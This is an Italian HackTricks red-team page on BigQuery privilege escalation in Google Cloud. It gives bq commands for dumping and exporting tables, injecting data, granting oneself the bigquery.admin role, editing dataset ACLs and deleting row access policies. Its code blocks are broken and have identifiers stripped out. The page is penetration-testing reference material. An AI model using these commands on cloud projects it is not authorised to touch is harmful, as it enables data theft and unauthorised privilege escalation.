GCP - BigQuery Privesc

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Controlla i piani di abbonamento!

Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.

Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.

BigQuery

Per maggiori informazioni su BigQuery consulta:

GCP - Bigquery Enum

Leggere le informazioni memorizzate all’interno di una tabella BigQuery potrebbe rivelare informazioni sensibili. Per accedere ai dati sono necessarie le autorizzazioni bigquery.tables.get, bigquery.jobs.create e bigquery.tables.getData:

Lettura dei dati della tabella BigQuery

```bash bq head . bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000' ```

Esportare dati

Questo è un altro modo per accedere ai dati. Esportali in un cloud storage bucket e scarica i file con le informazioni.
Per eseguire questa operazione sono necessarie le seguenti autorizzazioni: bigquery.tables.export, bigquery.jobs.create e storage.objects.create.

Esporta la tabella BigQuery in Cloud Storage

```bash bq extract .

"gs:///table*.csv" ```

Inserire dati

Potrebbe essere possibile inserire alcuni dati attendibili in una tabella Bigquery per sfruttare una vulnerabilità in qualche altro punto. Questo può essere fatto facilmente con le autorizzazioni bigquery.tables.get , bigquery.tables.updateData e bigquery.jobs.create:

Inserire dati in una tabella BigQuery

```bash # Via query bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

Via insert param

bq insert dataset.table /tmp/mydata.json

</details>

### `bigquery.datasets.setIamPolicy`

Un attacker potrebbe abusare di questo privilege per **assegnarsi ulteriori permissions** su un dataset BigQuery:

<details>
<summary>Imposta la policy IAM su un dataset BigQuery</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

`bigquery.datasets.update`, (`bigquery.datasets.get`)

Questa singola permission permette di aggiornare il tuo accesso a un dataset BigQuery modificando gli ACL che indicano chi può accedervi:

Aggiorna gli ACL del dataset BigQuery

```bash # Download current permissions, reqires bigquery.datasets.get bq show --format=prettyjson : > acl.json ## Give permissions to the desired user bq update --source acl.json : ## Read it with bq head $PROJECT_ID:.

```

`bigquery.tables.setIamPolicy`

Un attacker potrebbe abusare di questo privilegio per assegnarsi ulteriori permissions su una tabella BigQuery:

Set IAM policy on BigQuery table

```bash # For this you also need bigquery.tables.setIamPolicy bq add-iam-policy-binding \ --member='user:' \ --role='roles/bigquery.admin' \ :.

use the set-iam-policy if you don’t have bigquery.tables.setIamPolicy

</details>

### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Secondo la documentazione, con le autorizzazioni indicate è possibile **aggiornare una policy di accesso per riga.**\
Tuttavia, **usando la CLI `bq`** servono alcune autorizzazioni in più: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.

<details>
<summary>Crea o sostituisci la policy di accesso per riga</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

È possibile trovare l’ID del filtro nell’output dell’enumerazione delle row policies. Esempio:

List row access policies

```bash bq ls --row_access_policies :.

Id Filter Predicate Grantees Creation Time Last Modified Time

apac_filter term = “Cfba” user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09

</details>

Se hai **`bigquery.rowAccessPolicies.delete`** invece di `bigquery.rowAccessPolicies.update`, puoi anche semplicemente eliminare la policy:

<details>
<summary>Elimina row access policies</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Caution

Un’altra potenziale opzione per bypassare le row access policies sarebbe semplicemente cambiare il valore dei dati riservati. Se puoi vedere solo quando term è Cfba, modifica tutti i record della tabella in modo che abbiano term = "Cfba". Tuttavia questo è impedito da bigquery.

Tip

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Impara e pratica il hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporta HackTricks

Controlla i piani di abbonamento!

Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.

Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos su github.